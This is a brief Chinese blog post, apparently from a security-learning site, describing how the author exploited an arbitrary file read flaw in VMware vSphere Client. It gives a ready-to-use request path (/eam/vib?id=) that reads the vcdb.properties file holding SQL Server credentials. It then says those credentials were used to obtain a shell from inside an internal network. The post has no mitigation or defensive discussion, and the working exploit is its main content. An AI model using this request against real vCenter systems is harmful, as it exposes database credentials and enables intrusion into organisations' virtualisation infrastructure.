记一次 VSphere Client 任意文件读取漏洞的利用过程

前端长这样:

图片[1]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院
图片[2]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院

方法如下:

访问连接

1.1.1.1/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

图片[3]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院

会读取到SQL server账户密码

然后连接

图片[4]-记一次 VSphere Client 任意文件读取漏洞的利用过程-赤道学院

Ge’tshell 成功。前提要在一个内网。

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容